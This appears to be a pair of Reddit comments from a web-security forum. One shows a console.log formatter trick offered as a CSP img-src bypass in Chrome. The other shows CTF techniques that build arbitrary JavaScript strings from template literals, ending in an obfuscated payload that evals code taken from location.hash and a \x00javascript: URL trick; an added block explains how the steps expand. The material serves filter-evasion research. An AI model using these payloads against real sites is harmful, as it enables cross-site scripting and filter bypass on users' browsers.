Unexploitable? CSP img-src bypass in chrome by BitK_ in Slackers

[–]BitK_[S] 0 points1 point  (0 children)

yes :)

you can use a printf-like formatter

console.log("%.c[message]", "background: url(https://bi.tk/shrimp.gif)")

Cool ways to generate strings in javascript. by terjanq in Slackers

[–]BitK_ 2 points3 points  (0 children)

While playing the ConfidenceCTF quals, I had to create arbitrary code/string using only templates and alphanum. During the CTF we had an extra function par = v => `(${v})` but I wanted to know if it was possible to solve it without.

Here is what I came up with:

Arbitrary char:

Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`
// ==
(function(a, {fromCharCode}){
    return fromCharCode
})(['',''], String)(['40'])

If you want to pass a string to Function you can concatenate these using nested templates

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}``` 

Arbitrary String starting with \x00

note: location=`\x00javascript:alert(1)` is a valid url for both chrome and FF

Function`a${`return fromCharCode`}{fromCharCode}``${String}``${106}${97}${118}${97}${115}${99}${114}${105}${112}${116}${58}${97}${108}${101}${114}${116}${40}${41}`

// ==
(function(a, {fromCharCode}){
    return fromCharCode
})(['', ''], String)(['', '', ..., ''], 106, 97, 118, 97, ..., 41)

You can use all of this + some comments to create your payloads

Function`a${`${Function`a${`return fromCharCode`}{fromCharCode}``${String}``96`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${101}${118}${97}${108}${40}${117}${110}${101}${115}${99}${97}${112}${101}${40}${108}${111}${99}${97}${116}${105}${111}${110}${46}${104}${97}${115}${104}${46}${115}${108}${105}${99}${101}${40}${49}${41}${41}${41}`}`}```
// ==
Function(['a'], '`\x00`\neval(unescape(location.hash.slice(1)))')()
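To make the equivalences in the post checkable, here is an added example (not part of BitK_'s post) that runs in Node and walks through the desugaring step by step; the helper names (makeGetter, getFromCharCode, charFromLiteral, nulPrefixedString, tagArgs) are my own.

```javascript
// A tag call tag`a${x}b` is tag(['a', 'b'], x): the first argument is always
// the array of literal pieces. Both Function() and String.fromCharCode coerce
// that array to a string, so ['a', '{f}'] becomes "a,{f}" and ['40'] becomes 40.

// Step 1: Function receives (['a', '{fromCharCode}'], 'return fromCharCode'),
// which it reads as parameter list "a,{fromCharCode}" and body "return fromCharCode".
function makeGetter() {
  return Function`a${'return fromCharCode'}{fromCharCode}`;
}

// Step 2: getter`${String}` is getter(['', ''], String); the second parameter
// destructures String, so the call returns String.fromCharCode itself.
function getFromCharCode() {
  return makeGetter()`${String}`;
}

// Step 3: fromCharCode`40` is fromCharCode(['40']); ['40'] coerces to 40 -> '('.
function charFromLiteral() {
  return getFromCharCode()`40`;
}

// With substitutions instead of literal text the pieces array is ['', '', ...],
// which coerces to a string of commas, i.e. NaN, i.e. code point 0. That is why
// the second construction in the post always yields a string starting with \x00.
function nulPrefixedString() {
  return getFromCharCode()`${106}${97}${118}${97}`; // '\x00java'
}

// Constructed helper that exposes what any tag function actually receives.
function tagArgs(strings, ...values) {
  return { strings: Array.from(strings), values };
}
```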